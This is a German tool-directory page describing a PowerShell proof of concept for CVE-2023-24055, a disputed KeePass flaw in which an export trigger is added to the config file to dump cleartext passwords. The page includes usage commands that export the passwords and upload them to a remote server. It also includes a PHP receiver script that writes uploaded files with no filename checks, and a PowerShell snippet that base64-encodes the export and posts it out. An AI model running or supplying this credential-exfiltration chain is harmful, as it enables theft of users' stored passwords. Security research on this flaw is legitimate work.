Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-24055 — CVE-2023-24055 POC geschrieben in PowerShell. | Kitploit
Tools/GitHubGitHub/yosef0x01/cve-2023-24055
PasswortangriffeSchwachstellenanalyseExploitationDatenexfiltrationLernen & Bildung
GitHubyosef0x01/cve-2023-24055

CVE-2023-24055

CVE-2023-24055 POC geschrieben in PowerShell.

Repository anzeigen
14vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

alt text

Haftungsausschluss

Dieses Skript dient ausschließlich Bildungs- und Demonstrationszwecken. Der Autor befürwortet oder billigt nicht die Verwendung dieses Skripts für kriminelle oder bösartige Aktivitäten, und es sollte nur dort verwendet werden, wo dies ausdrücklich mit entsprechender Genehmigung erlaubt ist.

Dieses Skript sollte mit Vorsicht verwendet werden, da es die KeePass-Konfigurationsdatei verändert und alle zuvor konfigurierten Trigger löscht. Die Verwendung dieses Skripts kann zu unerwartetem Verhalten führen und möglicherweise die KeePass-Anwendung beschädigen. Verwendung auf eigene Gefahr.

Einführung

Dieses Skript demonstriert die ** UMSTRITTENE ** Schwachstelle (CVE-2023-24055) von KeePass bis Version 2.53 (in einer Standardinstallation), da es einem Angreifer mit Schreibzugriff auf die XML-Konfigurationsdatei ermöglicht, die Klartextpasswörter durch Hinzufügen eines Export-Triggers zu erhalten. Beachten Sie, dass der Hersteller die Auffassung vertritt, dass die Passwortdatenbank nicht gegen einen Angreifer gesichert sein soll, der einen solchen Zugriff auf den lokalen PC hat.

Referenzen:

  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24055
  • https://www.bleepingcomputer.com/news/security/keepass-disputes-vulnerability-allowing-stealthy-password-theft/
  • https://keepass.info/

Anleitung

Um dieses Skript zu verwenden, führen Sie es in PowerShell aus und geben die erforderlichen Parameter an. Die Pflichtparameter sind:

  • -filename: Der vollständige Dateipfad und der Name der Datei, in die die Passwörter exportiert werden sollen.

Die optionalen Parameter sind:

  • -uploadURL: Dieser Schalter wird verwendet, um anzugeben, dass die Daten an die angegebene URL hochgeladen werden sollen.
  • -url: Die URL, an die die Daten hochgeladen werden sollen.

Beispielverwendung

Klartextpasswörter exportieren:

root@kitploit:~
.\KlearPass.ps1 -filename c:\windows\tasks\export.txt

Klartextpasswörter exportieren und den Export auf den Webserver hochladen:

root@kitploit:~
.\KlearPass.ps1 -filename c:\windows\tasks\export.txt -uploadURL http://192.168.238.141/KeePass/upload.php

Detaillierte Hilfe:

root@kitploit:~
get-help .\KlearPass.ps1 -Detailed

Beispiel-PHP-Skript zum Hochladen einer Datei auf den Webserver

root@kitploit:~
<?php
if (!empty($_POST['filename']) && !empty($_POST['data'])) {
    $target_directory = '/var/www/html/KeePass/uploads/';
    $filename = $target_directory . $_POST['filename'];
    $data = base64_decode($_POST['data']);
    file_put_contents($filename, $data);
}
?>

Beispiel-PowerShell-Skript zum Testen des PHP-Uploads

root@kitploit:~
$filename = "c:\windows\tasks\export.txt";
$file = [System.IO.Path]::GetFileName($filename);
$encodedFile = [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes([System.IO.File]::ReadAllText($filename)));
$http = New-Object System.Net.WebClient;
$http.Headers.Add("Content-Type", "application/x-www-form-urlencoded");
$http.UploadString("http://192.168.238.141/KeePass/upload.php", "filename=$file&data=$encodedFile");

Danksagungen

  • Das Skript basiert ursprünglich auf Code aus https://github.com/GhostPack/KeeThief/blob/master/PowerShell/KeePassConfig.ps1
  • Die Idee, den Export zu exfiltrieren, stammt von https://github.com/alt3kx/CVE-2023-24055_PoC.
Tool herunterladen